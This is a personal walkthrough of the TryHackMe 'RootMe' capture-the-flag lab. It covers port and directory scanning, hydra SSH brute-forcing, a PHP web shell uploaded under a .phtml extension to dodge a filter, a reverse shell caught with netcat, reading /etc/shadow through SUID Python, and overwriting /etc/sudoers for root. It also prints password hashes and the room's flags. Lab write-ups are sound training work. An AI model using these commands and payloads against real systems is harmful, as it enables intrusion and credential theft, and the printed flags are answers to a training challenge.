rootme
https://tryhackme.com/room/rrootme
ROOTME WRITEUP

By Jacvbtaylor
Used openvpn and Kali Linux
https://tryhackme.com/room/rrootme
completed August 30, 2022
Step 1:
nmap -sn -v 10.10.52.28 -oG - | awk '/Up$/{print $2}' >> livehosts.txt && nmap -v -A -iL livehosts.txt >> nmapscans.txt
This script I wrote scans the host (or subnets if applied) and puts the IP(s) into a txt file that have responded and are up. Nmap takes that file and scans the hosts that are running, putting those results into a different txt (This script is very helpful when scanning a network as apposed to a single machine, but I still like to use it).
Once I have established a good baseline of what is running and open on the target, I will start another scan to look for vulnerabilites on that machine while I check out the rest of the open ports.
nmap -v -sV --script vulners 10.10.52.28 > vulnscan.txt
In this case, port 22 and 80 and running. There is a webpage for 10.10.52.28, but nothing to interact with for this index.
Step 2:
I tried running a directory attack using dirb, with no luck. I stopped it after about 10 minutes to switch to this
gobuster dir -u http://10.10.52.28 -w /usr/share/wordlists/dirb/common.txt
which resulted in a much faster and successful outcome. With this, I can gravitate toward the status 301 results.
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/css (Status: 301) [Size: 308] [–> http://10.10.52.28/css/]
/index.php (Status: 200) [Size: 616]
/js (Status: 301) [Size: 307] [–> http://10.10.52.28/js/]
/panel (Status: 301) [Size: 310] [–> http://10.10.52.28/panel/]
/server-status (Status: 403) [Size: 276]
/uploads (Status: 301) [Size: 312] [–> http://10.10.52.28/uploads/]
Browsing to http://10.10.52.28/panel/ brings me to a page where I can upload files. I tested this out with a random txt file from my machine. I uploaded it and changed my URL to http://10.10.52.28/uploads which showed me an index of the files in that folder.
Step 3:
This has a lot of potential, but while I try to exploit this, I ran a bruteforce on the SSH port in the event I may be able to discover an existing username and password
hydra -L /usr/share/metasploit-framework/data/wordlists/namelist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4
While this runs in the background, I began to think of the kind of files I can upload.
I started by creating a php file called cmd.php
<?php
$command = $_GET['cmd'];
echo system($command);
?>
Step 4:
The server responding with a message saying PHP is prohibited.
I uploaded the same file but with name cmd.php.jpg and this uploaded successfully. I am unable to execute the code with that extension so my next step is to figure out if there are other valid extension that will allow PHP to run.
I changed the name to cmd.phtml, uploaded, visited the url http://10.10.52.28/uploads/cmd.phtml and was greeted with a blank page.
It worked! Next step is to test commands.
http://10.10.52.28/uploads/cmd.phtml?cmd=ls
cmd.php.jpg cmd.phtml eth0.txt eth0.txt
http://10.10.52.28/uploads/cmd.phtml?cmd=whoami
www-data www-data
Step 5:
Next step is to try and run some scripts. I first encoded this cd …/…/…/ && ls
http://10.10.52.28/uploads/cmd.phtml?cmd=cd …%2F…%2F…%2F %26%26 ls
backups cache crash lib local lock log mail opt run snap spool tmp www www
http://10.10.52.28/uploads/cmd.phtml?cmd=cat %2Fetc%2Fpasswd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false rootme:x:1000:1000:RootMe:/home/rootme:/bin/bash sshd:x:110:65534::/run/sshd:/usr/sbin/nologin test:x:1001:1001:,,,:/home/test:/bin/bash test:x:1001:1001:,,,:/home/test:/bin/bash
This was a lot of info, so to simplify, I ran
http://10.10.52.28/uploads/cmd.phtml?cmd=cat %2Fetc%2Fpasswd | awk -F "%3A" '{print%241}'
root daemon bin sys sync games man lp mail news uucp proxy www-data backup list irc gnats nobody systemd-network systemd-resolve syslog messagebus _apt lxd uuidd dnsmasq landscape pollinate rootme sshd test test
Step 6:
This output all of the users for the server. This may come in handy for the SSH bruteforce but we can still maybe exploit the server more through this file upload. Maybe a PHP reverse shell?
Before trying that, I stopped my SSH bruteforce and changed the script to a valid username
hydra -l rootme -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4
Again, I am going to let this run while I explore more options.
The last thing I wanted to try with the URL cmd’s was to find who the sudo users are
http://10.10.52.28/uploads/cmd.phtml?cmd=getent group | grep sudo
sudo:x:27:rootme sudo:x:27:rootme
Step 7:
Now to create a reverse shell. I was able to make a new phtml file embedded with pentest monkey’s PHP reverse shell, uploading it to the site from the panel page and then running this script before running the file from the browser
ufw allow from 10.10.10.28 proto tcp to any port 1234 && nc -lnvp 4334
It worked!
listening on [any] 4334 … connect to [10.2.12.19] from (UNKNOWN) [10.10.52.28] 52082 Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 21:33:01 up 1:41, 0 users, load average: 0.00, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can’t access tty; job control turned off
$ whoami
www-data
Step 8:
Now comes the hard part. This is my first time being stuck as the www user. We have no sudo privileges. After some researching, I came across a possibility of an SUID escalation. To see the files with SUID permissions, I ran this:
$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
using the list output from the last command, I cross referenced the list here https://gtfobins.github.io/#+suid . To make it a little easier to cross reference, I spent way too long sorting the information by creating this script that puts the files I need to read MOSTLY in alphabetical order
find / -perm -u=s -type f 2>/dev/null | sed -e 's/snap\/core//g;s/\/9//g;s/\/6//;s/bin//;s/\/8//g' | awk -F "/" '{print$3,$4,$5}' | sed -e 's/usr//;s/lib//g' | sort
Step 9:
Python seems to be the only match to have SUID privileges. I loaded a shell using Python
$ whoami
www-data
$ su rootme
su: must be run from a terminal
$ python -c 'import os; os.system("/bin/sh")'
Same outcome as the reverse PHP shell. Still stuck as the www user for now.
whoami
www-dataid
uid=33(www-data) gid=33(www-data) groups=33(www-data)su
su: must be run from a terminalsu rootme
su: must be run from a terminal
Step 10:
Referencing https://rastating.github.io/privilege-escalation-via-python-library-hijacking/ it seems there may be a possibility of hijacking a library. This seems promising, but only if we discover some cron jobs ran by root a file or folder that we can write to for the python library.
python -c 'import sys; print "\n".join(sys.path)'
/usr/lib/python2.7 /usr/lib/python2.7/plat-x86_64-linux-gnu /usr/lib/python2.7/lib-tk /usr/lib/python2.7/lib-old /usr/lib/python2.7/lib-dynload /usr/local/lib/python2.7/dist-packages /usr/lib/python2.7/dist-packages
After trying what felt like everything, I was finally able to get access to the shadow file using this python script
python -c 'print(open("/etc/shadow").read())'
root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1:18478:0:99999:7::: daemon::18295:0:99999:7::: bin::18295:0:99999:7::: sys::18295:0:99999:7::: sync::18295:0:99999:7::: games::18295:0:99999:7::: man::18295:0:99999:7::: lp::18295:0:99999:7::: mail::18295:0:99999:7::: news::18295:0:99999:7::: uucp::18295:0:99999:7::: proxy::18295:0:99999:7::: www-data::18295:0:99999:7::: backup::18295:0:99999:7::: list::18295:0:99999:7::: irc::18295:0:99999:7::: gnats::18295:0:99999:7::: nobody::18295:0:99999:7::: systemd-network::18295:0:99999:7::: systemd-resolve::18295:0:99999:7::: syslog::18295:0:99999:7::: messagebus::18295:0:99999:7::: _apt::18295:0:99999:7::: lxd::18295:0:99999:7::: uuidd::18295:0:99999:7::: dnsmasq::18295:0:99999:7::: landscape::18295:0:99999:7::: pollinate::18295:0:99999:7::: rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.:18478:0:99999:7::: sshd::18478:0:99999:7::: test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0:18478:0:99999:7:::
Step 11:
python -c 'print(open("/etc/shadow").read())' | cat /etc/shadow | awk -F ":" '{print$1,$2}' | sed -n '/*/!p;/!/!p' > hashes
ls
hashes
cat hashes
root $6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1
rootme $6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.
test $6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0
sed 's/ /:/g' hashes > userhash
cat userhash
root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1
rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.
test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0
I got the password hashes! I thought this was going to be smooth sailing from here, but I thought wrong. I tried using john the ripper to crack any of the 3 password hashes I collected, but still no luck.
Step 12:
I thought back to what I had done to even get that information in the first place. I used python to open a file, what’s stopping me from writing to one??
python -c 'open("/etc/sudoers","w+").write("www-data ALL=(ALL) NOPASSWD:ALL")'
sudo -i
mesg: ttyname failed: Inappropriate ioctl for device
su
whoami
root
passwd www-data
Enter new UNIX password: test
Retype new UNIX password: test
passwd: password updated successfully
I finally moved up a user! The PHP shell we are still operating from is limited to certain commands, so I wanted to try my best to get an SSH login with my www user, but kept getting kicked out after logging in.
root㉿kali)-[/home/kali/rootme] └─#
ssh www-data@10.10.52.28 -p 22
www-data@10.10.52.28's password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64) System information as of Wed Aug 31 00:06:05 UTC 2022 System load: 0.11 Processes: 115 Usage of /: 20.5% of 19.56GB Users logged in: 0 Memory usage: 44% IP address for eth0: 10.10.52.28 Swap usage: 0% Last login: Wed Aug 31 00:05:41 2022 from 10.2.12.19 This account is currently not available. Connection to 10.10.52.28 closed. ┌──(root㉿kali)-[/home/kali/rootme] └─#
Step 13:
Oh well. Going back to the PHP shell, I located the user.txt file in /var/www
THM{y0u_g0t_a_sh3ll}
Lastly, I needed to locate the root.txt file
pwd
/root
ls
root.txt
cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}
Last updated
Was this helpful?